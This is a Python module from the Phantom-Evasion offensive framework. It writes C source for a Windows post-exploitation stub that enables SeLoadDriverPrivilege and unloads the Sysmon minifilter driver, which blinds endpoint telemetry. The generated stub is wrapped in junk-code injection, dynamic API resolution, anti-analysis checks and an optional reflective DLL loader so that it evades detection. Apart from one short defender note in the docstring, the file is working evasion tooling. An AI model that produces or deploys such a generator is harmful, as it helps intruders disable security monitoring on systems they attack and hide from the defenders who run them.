
     ########################################################################################
     #                                                                                      #
     #    This file is part of Phantom-Evasion.                                             #
     #                                                                                      #
     #    Phantom-Evasion is free software: you can redistribute it and/or modify           #
     #    it under the terms of the GNU General Public License as published by              #
     #    the Free Software Foundation, either version 3 of the License, or                 #
     #    (at your option) any later version.                                               #
     #                                                                                      #
     #    Phantom-Evasion is distributed in the hope that it will be useful,                #
     #    but WITHOUT ANY WARRANTY; without even the implied warranty of                    #
     #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                     #
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import JunkInjector
from usefull import WindowsDefend
from usefull import IncludeShuffler
#from usefull import WindowsDecoyProc
#from usefull import CloseDecoyProc
from usefull import WriteSource

def Postex_C_UnloadSysmonDriver_windows(ModOpt):
    """Write ``Source.c`` for a Windows post-exploitation stub that unloads the Sysmon minifilter.

    The emitted C program (``main`` when ``ModOpt["Outformat"] == "exe"``,
    ``DllMain`` when it is ``"dll"``) opens its own process token, enables
    ``SeLoadDriverPrivilege`` through ``LookupPrivilegeValue`` /
    ``AdjustTokenPrivileges``, then resolves ``FilterUnload`` from
    ``fltlib.dll`` and calls it with the filter name ``"SysmonDrv"``.  The
    returned ``HRESULT`` is assigned but never inspected by the generated code.

    Defender note: the observable footprint of this stub is an ordinary
    user-mode process adjusting its own token to enable
    SeLoadDriverPrivilege, immediately followed by the Sysmon minifilter
    unloading.  Privilege-use auditing on token right adjustments and
    alerting on the Sysmon driver/service stopping are the detection points
    for this kind of telemetry tampering.

    Args:
        ModOpt: module option dict.  Keys read: ``Outformat``, ``Reflective``,
            ``DynImport``, ``JI``, ``JF``, ``EF``.  When ``DynImport`` is
            ``True`` the keys ``NtdllHandle``, ``Ker32Handle`` and
            ``AdvapiHandle`` are *written* with fresh C identifiers; this
            function reads ``AdvapiHandle`` back for its GetProcAddress
            lookups (whether the other helpers also consume them is not
            visible here).

    Returns:
        None.  Side effect: ``WriteSource("Source.c", ...)``.
    """
    # C identifiers for the generated locals.  Creation order is kept
    # identical to the previous implementation so the same name stream
    # yields the same identifiers.
    token_var = varname_creator()
    priv_var = varname_creator()
    luid_var = varname_creator()
    unload_ptr = varname_creator()

    headers = [
        "#include <windows.h>\n",
        "#include <stdio.h>\n",
        "#include <string.h>\n",
        "#include <math.h>\n",
        "#include <time.h>\n",
    ]
    # Source fragments are collected in a list and joined once before
    # JunkInjector sees the text.
    parts = [IncludeShuffler(headers)]

    # Entry-point prologue.  An Outformat other than "exe"/"dll" emits none.
    outformat = ModOpt["Outformat"]
    if outformat == "exe":
        parts.append("int main(int argc,char * argv[]){\n")
    elif outformat == "dll":
        if ModOpt["Reflective"] == True:
            parts.append("#include \"ReflectiveLoader.h\"\n")
        parts.append("BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n")
        parts.append("BOOL bReturnValue = TRUE;\n")
        parts.append("if(dwReason ==  DLL_PROCESS_ATTACH){\n")

    if ModOpt["DynImport"] == True:
        # Module handles are published via ModOpt; AdvapiHandle is read back
        # below when the advapi32 imports are resolved at run time.
        for key, dll_name in (("NtdllHandle", "ntdll.dll"),
                              ("Ker32Handle", "kernel32.dll"),
                              ("AdvapiHandle", "advapi32.dll")):
            ModOpt[key] = varname_creator()
            parts.append("HANDLE {0} = GetModuleHandle(\"{1}\");\n".format(ModOpt[key], dll_name))

    # "$:START" / "$:EVA" / "$:END" are marker lines inside the emitted text;
    # presumably JunkInjector keys on them -- its implementation is not
    # visible here.
    parts.append("$:START\n")
    parts.append(WindowsDefend(ModOpt))
    # The decoy-process hooks (WindowsDecoyProc/CloseDecoyProc) are disabled
    # at the import level in this module, so nothing is emitted for them.
    parts.append("$:EVA\n")
    parts.append("HANDLE " + token_var + ";\n")

    # Three call sites differ between the dynamic-import and the plain
    # variant; the declarations and struct fill-in between them are shared.
    if ModOpt["DynImport"] == True:
        opt_ptr = varname_creator()
        atp_ptr = varname_creator()
        lpv_ptr = varname_creator()
        advapi = ModOpt["AdvapiHandle"]
        open_token = (
            "FARPROC {0} = GetProcAddress({1},\"OpenProcessToken\");\n"
            "if({0}(GetCurrentProcess(),TOKEN_ALL_ACCESS,&{2})){{\n"
        ).format(opt_ptr, advapi, token_var)
        lookup_priv = (
            "FARPROC {0} = GetProcAddress({1},\"LookupPrivilegeValue\");\n"
            "if({0}(NULL,\"SeLoadDriverPrivilege\",&{2})){{\n"
        ).format(lpv_ptr, advapi, luid_var)
        adjust_priv = (
            "FARPROC {0} = GetProcAddress({1},\"AdjustTokenPrivileges\");\n"
            "if({0}({2},FALSE,&{3},sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){{\n"
        ).format(atp_ptr, advapi, token_var, priv_var)
    else:
        open_token = "if(OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&{0})){{\n".format(token_var)
        lookup_priv = "if (LookupPrivilegeValue(NULL,\"SeLoadDriverPrivilege\",&{0})){{\n".format(luid_var)
        adjust_priv = (
            "if(AdjustTokenPrivileges({0},FALSE,&{1},sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){{\n"
        ).format(token_var, priv_var)

    parts.extend([
        open_token,
        "TOKEN_PRIVILEGES " + priv_var + ";\n",
        "LUID " + luid_var + ";\n",
        lookup_priv,
        priv_var + ".PrivilegeCount = 1;\n",
        priv_var + ".Privileges[0].Luid = " + luid_var + ";\n",
        priv_var + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n",
        adjust_priv,
        # FilterUnload is taken from fltlib.dll; the three closing braces end
        # the nested if() blocks opened above.
        "FARPROC " + unload_ptr + " = GetProcAddress(GetModuleHandle(\"fltlib.dll\"),\"FilterUnload\");\n",
        "HRESULT unload = " + unload_ptr + "(\"SysmonDrv\");}}}\n",
        "$:END\n",
    ])

    source = JunkInjector("".join(parts), ModOpt["JI"], ModOpt["JF"], ModOpt["EF"], False)

    # Entry-point epilogue, re-reading Outformat as the original did.
    outformat = ModOpt["Outformat"]
    if outformat == "exe":
        source += "return 0;}"
    elif outformat == "dll":
        source += "}\nreturn bReturnValue;}\n"

    WriteSource("Source.c", source)


